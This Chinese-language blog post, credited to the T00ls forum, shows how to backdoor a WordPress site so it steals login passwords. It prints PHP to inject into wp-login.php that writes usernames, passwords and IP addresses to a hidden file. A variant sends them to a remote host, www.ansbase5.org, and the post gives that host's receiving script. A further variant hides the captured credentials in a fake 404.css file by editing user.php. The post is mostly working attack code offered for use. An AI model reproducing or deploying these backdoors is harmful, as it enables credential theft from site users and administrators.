第一种:

wp-login.php页面

$redirect_to = apply_filters( 'login_redirect', $redirect_to, $requested_redirect_to, $user ); //第765行
/** 在这里注入代码 **/
        if ( !is_wp_error($user) && !$reauth ) {
                if ( $interim_login ) {
                        $message = '<p class="message">' . __('You have logged in successfully.') . '</p>';
                        $interim_login = 'success';
                        login_header( '', $message ); ?>
                        </div>
                        <?php
                        /** This action is documented in wp-login.php */
                        do_action( 'login_footer' ); ?>
                        <?php if ( $customize_login ) : ?>
                                <script type="text/javascript">setTimeout( function(){ new wp.customize.Messenger({ url: '<?php echo wp_customize_url(); ?>', channel: 'login' }).send('login') }, 1000 );</script>
                        <?php endif; ?>
                        </body></html>
<?php                exit;
                }

要插入的代码

if ( !is_wp_error($user) && !$reauth ) //验证是否登陆成功,等等 
{
        $hang333=$_POST['log'].'|'.$_POST['pwd'].'|'.$_SERVER["REMOTE_ADDR"];
        $fp=fopen( dirname(__FILE__) . './wp-content/hang333.php','a+');
        fputs($fp,$hang333."\r\n");
        fclose($fp);
        }

以上内容来自T00ls

如果发往远程服务器
远程服务器的接收脚本Get_result.php

<?php

if ( !empty($_GET['passw'] )){
    $result = $_GET['passw'];
    $fp=fopen('pass.txt','a+');
    fputs($fp,$result."\r\n");
    fclose($fp);
}
?>

我们插入的代码修改为:

if ( !is_wp_error($user) && !$reauth ) //验证是否登陆成功,等等 
{
        $hang333=$_POST['log'].'|'.$_POST['pwd'].'|'.$_SERVER["REMOTE_ADDR"];
        $url='http://www.ansbase5.org/Get_result.php?passw='.$hang333;  
        $html = file_get_contents($url);  
        }
?>

第二种

其实跟第一种一个锤子样,

if ( ( empty( $redirect_to ) || $redirect_to == 'wp-admin/' || $redirect_to == admin_url() ) ) {

第三种

有些网站是登陆之后跳转到前台的,用第一种姿势,就是说登陆成光无论跳不跳转到后台,很多时候都记录不到密码的,不晓得怎么回事,我自己的PHP代码阅读能力又非常堪忧,所以就把所有post过来的数据我都记录下来,并且发送到远程服务器。具体发挥,看给你的了。

case 'login'

第四种 (测试找不到该处代码)

wp-includes下的user.php,找到如下行:

function wp_authenticate_username_password($user, $username, $password) {

$user = new WP_User($userdata->ID);下加如下代码:

$t=date("Y-m-d H:i:s");
$fp = fopen('wp-content/themes/default/404.css', 'a'); 
fwrite($fp, $t.'-user: '.$username.'-pass:'.$password);
fwrite($fp, "\n");

密码记录到wp-content/themes/default/404.css文件
來源: https://www.t00ls.net/viewthread.php?tid=13219&highlight=wordpress

发表评论

电子邮件地址不会被公开。 必填项已用*标注